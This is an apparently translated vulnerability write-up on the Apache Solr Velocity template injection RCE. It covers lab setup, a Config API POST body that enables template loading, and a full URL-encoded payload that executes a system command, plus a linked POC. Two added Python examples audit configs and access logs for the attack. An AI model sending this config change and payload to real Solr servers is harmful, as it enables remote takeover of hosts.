
Example Analysis of the Apache Solr Velocity Template Injection RCE Vulnerability

2025-02-23 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

This article walks through an example analysis of the Apache Solr Velocity template injection RCE vulnerability.

0x01 Introduction

Solr is a standalone enterprise search server that exposes a web-service-like API. Users can submit XML files in a defined format to the server over HTTP to build an index, and can issue search requests with HTTP GET and receive the results in XML format.

0x02 Vulnerability overview

Solr includes a VelocityResponseWriter component. An attacker can construct a specific request that modifies its configuration so that the component allows a specified template to be loaded, which leads to remote command execution through Velocity template injection. An attacker can exploit this to gain server privileges directly.

0x03 Affected versions

Apache Solr 5.x through 8.2.0, in versions where the Config API exists

0x04 Environment setup

Install a Java 8 environment, and then download Solr from:

https://www.apache.org/dyn/closer.lua/lucene/solr/8.2.0/solr-8.2.0.zip

After the download completes, unzip it, then go to the bin directory and run ./solr start

unzip solr-8.2.0.zip

Some warning messages appear at startup. They can be eliminated by editing the solr.in.sh file under bin and setting SOLR_ULIMIT_CHECKS to false

vim solr.in.sh

Then run ./solr start again. If startup fails when running as root, add -force to the end.

The following interface appears when the browser accesses http://ip:8983, indicating that the installation is successful.

However, a core could not be created from the interface.

Manually create a new_core folder under the /server/solr/ directory, copy the conf directory under /server/solr/configsets/_default/ into the new_core directory, and then click create

0x05 Vulnerability reproduction

After the core is created, request the following URL to check whether the core's config can be accessed.

http://ip:8983/solr/new_core/config

Apache Solr integrates the VelocityResponseWriter plug-in by default, and params.resource.loader.enabled in the plug-in's initialization parameters defaults to false. However, the configuration can be modified directly through a POST request to set it to true, after which a specially constructed GET request achieves remote code execution.

Use Burp to capture the request for this page, change it into a POST request, and add the following data

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}
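To check whether a core has been reconfigured this way, the following added example (not part of the original article) audits a config document for a VelocityResponseWriter with params.resource.loader.enabled set to true. It assumes the JSON is the saved output of the /solr/<core>/config endpoint or a configoverlay.json file; because the exact nesting is an assumption, it searches the whole document, and both samples are constructed.

```python
import json

WRITER_CLASS = "VelocityResponseWriter"
RISKY_KEY = "params.resource.loader.enabled"  # setting named in the article

# Constructed samples, not captured from a real server.
SAMPLE_DEFAULT = """{"config": {"queryResponseWriter": {"velocity": {
  "startup": "lazy", "name": "velocity",
  "class": "solr.VelocityResponseWriter"}}}}"""
SAMPLE_MODIFIED = """{"config": {"queryResponseWriter": {"velocity": {
  "startup": "lazy", "name": "velocity",
  "class": "solr.VelocityResponseWriter", "template.base.dir": "",
  "solr.resource.loader.enabled": "true",
  "params.resource.loader.enabled": "true"}}}}"""


def find_writers(node, path=""):
    """Yield (path, definition) for every dict whose "class" names the Velocity writer."""
    if isinstance(node, dict):
        if WRITER_CLASS in str(node.get("class", "")):
            yield path or "/", node
        for key, value in node.items():
            yield from find_writers(value, f"{path}/{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from find_writers(value, f"{path}/{index}")


def is_true(value):
    # Config values may be JSON booleans or strings such as "true".
    return str(value).strip().lower() == "true"


def audit_config(text):
    """Return one finding per Velocity writer; risky=True means request-supplied templates are allowed."""
    return [
        {"path": path, "name": writer.get("name"),
         "risky": is_true(writer.get(RISKY_KEY, False))}
        for path, writer in find_writers(json.loads(text))
    ]


if __name__ == "__main__":
    for label, doc in (("default", SAMPLE_DEFAULT), ("modified", SAMPLE_MODIFIED)):
        print(label, audit_config(doc))
```
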

We can then construct a payload to achieve RCE

Payload:

Http://ip:8983/solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor() +% 23set ($out=$ex.getInputStream ()) +% 23foreach ($str.valueOf + [1..$out.available ()]) $str.valueOf ($chr.toChars ($out.read ()% 23end

POC address: https://github.com/wyzxxz/Apache_Solr_RCE_via_Velocity_template
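Both requests in this section leave a trace in the HTTP access log. The following added example (not part of the original article or the linked POC) flags POST requests to a core's config endpoint and requests that combine wt=velocity with an inline v.template.* parameter. It assumes an NCSA-style request log; the log lines and IP addresses are constructed, and the first inline-template line carries only the opening of the template shown above.

```python
import re
from urllib.parse import urlsplit, parse_qs

REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
CONFIG_PATH = re.compile(r"/solr/[^/]+/config(/.*)?")

# Constructed log lines in NCSA format (assumed layout), for illustration only.
SAMPLE_LOG = [
    '203.0.113.5 - - [23/Feb/2025:10:00:01 +0000] "POST /solr/new_core/config HTTP/1.1" 200 210',
    '203.0.113.5 - - [23/Feb/2025:10:00:04 +0000] "GET /solr/new_core/select?q=1&&wt=velocity'
    '&v.template=custom&v.template.custom=%23set($x=%27%27) HTTP/1.1" 200 45',
    '198.51.100.7 - - [23/Feb/2025:10:01:00 +0000] "GET /solr/new_core/select?q=*:*&wt=json HTTP/1.1" 200 512',
    '198.51.100.7 - - [23/Feb/2025:10:01:05 +0000] "GET /solr/new_core/config HTTP/1.1" 200 9000',
    '198.51.100.7 - - [23/Feb/2025:10:01:09 +0000] "GET /solr/new_core/select?q=a&wt=velocity'
    '&v.template=browse HTTP/1.1" 200 800',
]


def classify(line):
    """Return a label for a suspicious request line, or None."""
    match = REQUEST.search(line)
    if not match:
        return None
    url = urlsplit(match["target"])
    params = parse_qs(url.query, keep_blank_values=True)
    # The access log has no request body, so any write to the Config API is flagged for review.
    if match["method"] == "POST" and CONFIG_PATH.fullmatch(url.path):
        return "config-api-write"
    uses_velocity = "velocity" in [v.lower() for v in params.get("wt", [])]
    inline_template = any(key.startswith("v.template.") for key in params)
    if uses_velocity and inline_template:
        return "velocity-inline-template"
    return None


def scan(lines):
    """Return (line_number, label) for every flagged line."""
    hits = [(number, classify(line)) for number, line in enumerate(lines, 1)]
    return [(number, label) for number, label in hits if label]


if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A config-api-write followed shortly by a velocity-inline-template hit from the same client matches the sequence described in this section.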

0x06 Remediation

Update to the latest version
